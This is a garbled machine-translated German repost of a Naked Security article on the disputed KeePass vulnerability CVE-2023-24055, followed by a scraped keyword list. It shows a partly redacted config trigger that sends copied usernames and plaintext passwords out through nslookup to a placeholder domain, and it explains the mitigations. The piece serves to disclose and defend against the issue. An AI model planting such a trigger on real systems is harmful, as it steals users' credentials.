Es waren ein paar Wochen mit Nachrichtenwert für Passwort-Manager – diese praktischen Dienstprogramme, die Ihnen helfen, für jede Website, die Sie verwenden, ein anderes Passwort zu finden und sie dann alle im Auge zu behalten.
Ende 2022 war LastPass an der Reihe, in die Schlagzeilen zu kommen, als das Unternehmen schließlich zugab, dass ein Verstoß, den es im August 2022 erlitten hatte, tatsächlich mit dem Passwort der Kunden endete Gewölbe werden gestohlen von dem Cloud-Dienst, wo sie gesichert wurden.
(Die Passwörter selbst wurden nicht gestohlen, weil die Tresore verschlüsselt waren und LastPass keine Kopien von irgendjemandes „Hauptschlüssel“ für die Backup-Tresordateien selbst hatte, aber es war eine gründlichere Rasur, als die meisten Leute gerne hörten.)
Dann war LifeLock an der Reihe, überall in den Nachrichten zu sein, als das Unternehmen vor einem Ausschlag warnte, der wie ein Ausschlag aussah Angriffe zum Erraten von Passwörtern, wahrscheinlich basierend auf Passwörtern, die möglicherweise vor einiger Zeit von einer völlig anderen Website gestohlen und möglicherweise kürzlich im Dark Web gekauft wurden.
LifeLock selbst war nicht verletzt worden, aber einige seiner Benutzer waren es, dank des Passwort-Sharing-Verhaltens, das durch Risiken verursacht wurde, an deren Übernahme sie sich möglicherweise nicht einmal erinnern konnten.
Die Konkurrenten 1Password und BitWarden waren kürzlich ebenfalls in den Nachrichten, basierend auf Berichten über böswillige Anzeigen, die offensichtlich unwissentlich von Google ausgestrahlt wurden und die Benutzer überzeugend dazu verleiteten, Anmeldeseiten zu replizieren, um ihre Kontodaten zu phishing.
Jetzt ist KeePass an der Reihe in den Nachrichten, diesmal für ein weiteres Cybersicherheitsproblem: ein angebliches Verwundbarkeit, der Fachjargon, der für Softwarefehler verwendet wird, die zu Cybersicherheitslücken führen, die Angreifer möglicherweise für böse Zwecke ausnutzen können.
Passwort-Sniffing leicht gemacht
Wir bezeichnen es als Verwundbarkeit hier, weil es eine offizielle Fehlerkennung hat, die vom US National Institute for Standards and Technology herausgegeben wird.
Der Fehler wurde synchronisiert CVE-2023-24055: Ein Angreifer, der Schreibzugriff auf die XML-Konfigurationsdatei hat, [kann] die Klartext-Passwörter erhalten, indem er einen Export-Trigger hinzufügt.
Die Behauptung, Klartext-Passwörter erhalten zu können, ist leider wahr.
Wenn ich Schreibzugriff auf Ihre persönlichen Dateien habe, einschließlich Ihrer sog %APPDATA%
Verzeichnis kann ich den Konfigurationsabschnitt heimlich optimieren, um KeePass-Einstellungen zu ändern, die Sie bereits angepasst haben, oder um Anpassungen hinzuzufügen, wenn Sie nicht wissentlich etwas geändert haben …
…und ich kann Ihre Klartext-Passwörter überraschend einfach stehlen, entweder in großen Mengen, indem Sie beispielsweise die gesamte Datenbank als unverschlüsselte CSV-Datei ausgeben, oder wie Sie sie verwenden, indem Sie beispielsweise einen „Programm-Hook“ setzen, der bei jedem Zugriff ausgelöst wird a Passwort aus der Datenbank.
Beachten Sie, dass ich nicht brauche Administrator Privilegien, da ich mich nicht mit dem eigentlichen Installationsverzeichnis herumschlagen muss, in dem die KeePass-App gespeichert wird, was normalerweise für normale Benutzer gesperrt ist
Und ich brauche keinen Zugriff auf gesperrte globale Konfigurationseinstellungen.
Interessanterweise tut KeePass alles, um zu verhindern, dass Ihre Passwörter ausspioniert werden, wenn Sie sie verwenden, einschließlich der Verwendung von Manipulationsschutztechniken, um verschiedene Anti-Keylogger-Tricks zu stoppen, selbst von Benutzern, die bereits über Sysadmin-Befugnisse verfügen.
Aber die KeePass-Software macht es auch überraschend einfach, Klartext-Passwortdaten zu erfassen, vielleicht auf eine Weise, die Sie selbst für Nicht-Administratoren als „zu einfach“ ansehen.
Es war eine Minute Arbeit, die KeePass-GUI zum Erstellen einer Auslösen -Ereignis, das jedes Mal ausgeführt wird, wenn Sie ein Passwort in die Zwischenablage kopieren, und um dieses Ereignis so einzustellen, dass es eine DNS-Suche durchführt, die sowohl den Benutzernamen als auch das betreffende Klartext-Passwort enthält:
Wir könnten dann die nicht allzu offensichtliche XML-Einstellung für diese Option aus unserer eigenen lokalen Konfigurationsdatei in die Konfigurationsdatei eines anderen Benutzers auf dem System kopieren, woraufhin auch sie feststellen würden, dass ihre Passwörter über das Internet durch DNS-Lookups durchgesickert sind.
Obwohl die XML-Konfigurationsdaten weitgehend lesbar und informativ sind, verwendet KeePass seltsamerweise zufällige Datenstrings, die als GUIDs (kurz für weltweit eindeutige Kennungen), um die verschiedenen zu bezeichnen Auslösen Einstellungen, so dass selbst ein gut informierter Benutzer eine umfangreiche Referenzliste benötigen würde, um zu verstehen, welche Trigger wie eingestellt werden.
So sieht unser DNS-Leaking-Trigger aus, obwohl wir einige Details redigiert haben, damit Sie keinen unmittelbaren Unfug anstellen können, indem Sie diesen Text direkt kopieren und einfügen:
XXXXXXXXXXXXXXXXXXX Kopieren Stehlen Sie Sachen über DNS-Lookups XXXXXXXXXXXXXXXXXXX 0XXXXXXXXXXXXXXXXXXX nslookup XXXXX.XXXXX.bla.test WAHR 1
Wenn dieser Auslöser aktiv ist, führt der Zugriff auf ein KeePass-Passwort dazu, dass der Klartext in einer unauffälligen DNS-Suche zu einer Domain meiner Wahl durchsickert, was ist blah.test
in diesem Beispiel.
Beachten Sie, dass echte Angreifer den gestohlenen Text mit ziemlicher Sicherheit verschlüsseln oder verschleiern würden, was es nicht nur schwieriger machen würde, DNS-Lecks zu erkennen, sondern sich auch um Passwörter kümmern würde, die Nicht-ASCII-Zeichen wie Buchstaben mit Akzent oder Emojis enthalten. die sonst nicht in DNS-Namen verwendet werden können:
Aber ist es wirklich ein Bug?
Die knifflige Frage ist jedoch, „Ist das wirklich ein Fehler oder ist es nur eine mächtige Funktion, die von jemandem missbraucht werden könnte, der bereits mindestens so viel Kontrolle über Ihre privaten Dateien benötigt wie Sie selbst?“
Einfach gesagt, ist es eine Schwachstelle, wenn jemand, der bereits die Kontrolle über Ihr Konto hat, mit Dateien herumspielen kann, auf die Ihr Konto sowieso zugreifen sollte?
Auch wenn Sie vielleicht hoffen, dass ein Pssword-Manager viele zusätzliche Ebenen des Manipulationsschutzes enthält, um den Missbrauch von Bugs/Features dieser Art zu erschweren, sollten Sie dies tun CVE-2023-24055 wirklich eine CVE-gelistete Schwachstelle sein?
Wenn ja, würden Befehle wie z DEL
(eine Datei löschen) und FORMAT
müssen es auch „Bugs“ sein?
Und wäre nicht die bloße Existenz von PowerShell, die es viel einfacher macht, potenziell gefährliches Verhalten zu provozieren (try powerhsell get-clipboard
, zum Beispiel), eine eigene Schwachstelle sein?
Das ist die Position von KeePass, bestätigt durch den folgenden Text, der dem hinzugefügt wurde „Fehler“-Detail auf der NIST-Website:
** STRITT ** […] HINWEIS: Der Hersteller vertritt die Position, dass die Passwortdatenbank nicht gegen einen Angreifer geschützt sein soll, der diese Zugriffsebene auf den lokalen PC hat.
Was ist zu tun?
Wenn Sie ein eigenständiger KeePass-Benutzer sind, können Sie nach betrügerischen Triggern wie dem oben erstellten „DNS Stealer“ suchen, indem Sie die KeePass-App öffnen und die Tools > Löst aus… Fenster:
Beachten Sie, dass Sie das Ganze drehen können Auslösen System aus diesem Fenster ausschalten, indem Sie einfach die Markierung aufheben [ ] Enable trigger system
Möglichkeit…
… aber das ist keine globale Einstellung, kann also über Ihre lokale Konfigurationsdatei wieder eingeschaltet werden und schützt Sie daher nur vor Fehlern und nicht vor einem Angreifer mit Zugriff auf Ihr Konto.
Sie können die Option für alle auf dem Computer deaktivieren, ohne dass sie sie selbst wieder aktivieren können, indem Sie die globale „Lockdown“-Datei ändern KeePass.config.enforced.XML
, befindet sich in dem Verzeichnis, in dem das App-Programm selbst installiert ist.
Trigger werden für alle erzwungen, wenn Ihre globale XML-Erzwingungsdatei wie folgt aussieht:
FALSCH
(Falls Sie sich fragen, ein Angreifer, der Schreibzugriff auf das Anwendungsverzeichnis hat, um diese Änderung rückgängig zu machen, hätte mit ziemlicher Sicherheit genug Leistung auf Systemebene, um die ausführbare KeePass-Datei selbst zu ändern oder trotzdem einen eigenständigen Keylogger zu installieren und zu aktivieren.)
Wenn Sie ein Netzwerkadministrator sind, der damit beauftragt ist, KeePass auf den Computern Ihrer Benutzer zu sperren, damit es immer noch flexibel genug ist, um ihnen zu helfen, aber nicht flexibel genug, um Cyberkriminellen versehentlich zu helfen, empfehlen wir Ihnen, KeePass durchzulesen Sicherheitsprobleme Seite, die Auslöser Seite, und die Erzwungene Konfiguration
- SEO-gestützte Content- und PR-Distribution. Holen Sie sich noch heute Verstärkung.
- Platoblockkette. Web3-Metaverse-Intelligenz. Wissen verstärkt. Hier zugreifen.
- Quelle: https://nakedsecurity.sophos.com/2023/02/01/password-stealing-vulnerability-reported-in-keypass-bug-or-feature/
- 1
- 2022
- 70
- a
- Fähig
- Über Uns
- oben
- Absolute
- Zugang
- Zugriff
- Konto
- aktiv
- hinzugefügt
- zugelassen
- Siehe Werbung
- Nach der
- gegen
- Alle
- angeblich
- bereits
- und
- Ein anderer
- App
- Anwendung
- AUGUST
- Autor
- Auto
- Zurück
- unterstützt
- background-image
- Sicherungskopie
- basierend
- weil
- Sein
- Grenze
- Boden
- Verletzung
- Fehler
- Bugs
- Erfassung
- österreichische Unternehmen
- Häuser
- verursacht
- Ursachen
- Center
- sicherlich
- Übernehmen
- Zeichen
- aus der Ferne überprüfen
- Wahl
- Anspruch
- näher
- Cloud
- Farbe
- wie die
- Unternehmen
- uneingeschränkt
- Computer
- Computer
- Bedingungen
- Konfiguration
- Geht davon
- Smartgeräte App
- Kopien
- könnte
- Abdeckung
- erstellen
- erstellt
- cve
- Cyber-Kriminelle
- Internet-Sicherheit
- Gefährlich
- Dunkel
- Dunkle Web
- technische Daten
- Datenbase
- Details
- DID
- anders
- Direkt
- Display
- dns
- Domain
- Nicht
- nach unten
- synchronisiert
- einfacher
- leicht
- entweder
- verschlüsselt
- Durchsetzung
- genug
- Ganz
- Sogar
- Event
- Jedes
- jedermann
- Beispiel
- Ausnutzen
- exportieren
- umfangreiche
- extra
- Merkmal
- wenige
- Reichen Sie das
- Mappen
- Endlich
- Finden Sie
- flexibel
- Folgende
- Zwingen
- gefunden
- für
- bekommen
- bekommen
- Global
- Goes
- praktisch
- glücklich
- mit
- Höhe
- Hilfe
- hier
- Bohrungen
- ein Geschenk
- schweben
- Ultraschall
- aber
- HTML
- HTTPS
- Kennzeichnung
- unmittelbar
- in
- das
- inklusive
- Einschließlich
- informativ
- installieren
- Instanz
- Institut
- Internet
- Problem
- Herausgegeben
- IT
- selbst
- Jargon
- Behalten
- bekannt
- weitgehend
- Lastpass
- Lagen
- führen
- Leck
- Undichtigkeiten
- Niveau
- Liste
- aus einer regionalen
- sah
- SIEHT AUS
- Nachschlagen
- gemacht
- um
- MACHT
- Manager
- Manager
- Marge
- max-width
- könnte
- Fehler
- Fehler
- ändern
- vor allem warme
- Namen
- National
- Need
- Netzwerk
- News
- nist
- normal
- erhalten
- offiziell
- Eröffnung
- Option
- Andernfalls
- besitzen
- Parameter
- Passwort
- Passwörter
- Alexander
- PC
- Personen
- vielleicht
- persönliche
- Phishing
- Klartext
- Plato
- Datenintelligenz von Plato
- PlatoData
- Position
- BLOG-POSTS
- möglicherweise
- Werkzeuge
- größte treibende
- Kräfte
- Powershell
- privat
- Privilegien
- wahrscheinlich
- Programm
- gekauft
- Zwecke
- setzen
- Frage
- zufällig
- Ausschlag
- Lesebrillen
- kürzlich
- empfehlen
- regulär
- merken
- antworten
- Berichtet
- Meldungen
- rückgängig machen
- Risiken
- Führen Sie
- Abschnitt
- Verbindung
- Sinn
- kompensieren
- Einstellung
- Einstellungen
- Short
- sollte
- einfach
- So
- Software
- solide
- einige
- Jemand,
- Spot
- standalone
- Normen
- Immer noch
- gestohlen
- Stoppen
- gelagert
- so
- vermutet
- SVG
- System
- Nehmen
- Techniken
- Technologie
- Das
- ihr
- sich
- deswegen
- Durch
- Zeit
- zu
- auch
- Top
- verfolgen sind
- Übergang
- transparent
- auslösen
- was immer dies auch sein sollte.
- WENDE
- Turned
- typisch
- einzigartiges
- URL
- us
- -
- Mitglied
- Nutzer
- Dienstprogramme
- verschiedene
- Gewölbe
- Gewölbe
- Verwundbarkeit
- W3
- Wege
- Netz
- Webseite
- Wochen
- Was
- welche
- WHO
- werden wir
- fragen
- Arbeiten
- würde
- schreiben
- XML
- Ihr
- sich selbst
- Zephyrnet